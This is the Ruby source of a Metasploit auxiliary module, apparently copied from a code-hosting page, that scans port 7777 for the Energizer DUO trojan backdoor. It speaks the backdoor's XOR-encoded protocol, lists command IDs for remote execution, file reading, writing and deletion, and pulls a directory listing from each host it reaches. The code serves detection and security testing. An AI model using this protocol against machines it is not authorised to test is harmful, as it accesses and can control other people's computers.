116 lines
2.4 KiB
Ruby
116 lines
2.4 KiB
Ruby
|
##
|
||
|
# This file is part of the Metasploit Framework and may be subject to
|
||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||
|
# Framework web site for more information on licensing and terms of use.
|
||
|
# http://metasploit.com/framework/
|
||
|
##
|
||
|
|
||
|
|
||
|
require 'msf/core'
|
||
|
|
||
|
|
||
|
class Metasploit3 < Msf::Auxiliary
|
||
|
|
||
|
include Msf::Exploit::Remote::Tcp
|
||
|
include Msf::Auxiliary::Scanner
|
||
|
include Msf::Auxiliary::Report
|
||
|
|
||
|
def initialize
|
||
|
super(
|
||
|
'Name' => 'Energizer DUO Trojan Scanner',
|
||
|
'Version' => '$Revision$',
|
||
|
'Description' => 'Detect instances of the Energizer DUO trojan horse software on port 7777',
|
||
|
'Author' => 'hdm',
|
||
|
'References' =>
|
||
|
[
|
||
|
['CVE', '2010-0103'],
|
||
|
['URL', 'http://www.kb.cert.org/vuls/id/154421']
|
||
|
],
|
||
|
'License' => MSF_LICENSE
|
||
|
)
|
||
|
|
||
|
register_options(
|
||
|
[
|
||
|
Opt::RPORT(7777),
|
||
|
], self.class)
|
||
|
end
|
||
|
|
||
|
def trojan_encode(str)
|
||
|
str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*")
|
||
|
end
|
||
|
|
||
|
def trojan_command(cmd)
|
||
|
cid = ""
|
||
|
|
||
|
case cmd
|
||
|
when :exec
|
||
|
cid = "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}"
|
||
|
when :dir
|
||
|
cid = "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}"
|
||
|
when :write
|
||
|
cid = "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}"
|
||
|
when :read
|
||
|
cid = "{F6C43E1A-1551-4000-A483-C361969AEC41}"
|
||
|
when :nop
|
||
|
cid = "{783EACBF-EF8B-498e-A059-F0B5BD12641E}"
|
||
|
when :find
|
||
|
cid = "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}"
|
||
|
when :yes
|
||
|
cid = "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}"
|
||
|
when :runonce
|
||
|
cid = "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}"
|
||
|
when :delete
|
||
|
cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"
|
||
|
end
|
||
|
|
||
|
trojan_encode(
|
||
|
[0x27].pack("V") + cid + "\x00"
|
||
|
)
|
||
|
end
|
||
|
|
||
|
def run_host(ip)
|
||
|
|
||
|
begin
|
||
|
|
||
|
connect
|
||
|
sock.put(trojan_command(:dir))
|
||
|
sock.put(
|
||
|
trojan_encode(
|
||
|
[4].pack("V") + "C:\\\x00\x00"
|
||
|
)
|
||
|
)
|
||
|
|
||
|
lbuff = sock.get_once(4, 5)
|
||
|
if(not lbuff)
|
||
|
print_error("#{ip}:#{rport} UNKNOWN: No response to the directory listing request")
|
||
|
disconnect
|
||
|
return
|
||
|
end
|
||
|
|
||
|
len = trojan_encode(lbuff).unpack("V")[0]
|
||
|
dbuff = sock.get_once(len, 30)
|
||
|
data = trojan_encode(dbuff)
|
||
|
files = data.split("|").map do |x|
|
||
|
if x[0,2] == "?1"
|
||
|
["D", x[2,x.length-2]]
|
||
|
else
|
||
|
["F", x]
|
||
|
end
|
||
|
end
|
||
|
|
||
|
# Required to prevent the server from spinning a loop
|
||
|
sock.put(trojan_command(:nop))
|
||
|
|
||
|
print_status("#{ip}:#{rport} FOUND: #{files.inspect}")
|
||
|
|
||
|
disconnect
|
||
|
|
||
|
rescue ::Interrupt
|
||
|
raise $!
|
||
|
rescue ::Rex::ConnectionError, ::IOError
|
||
|
end
|
||
|
|
||
|
end
|
||
|
end
|
||
|
|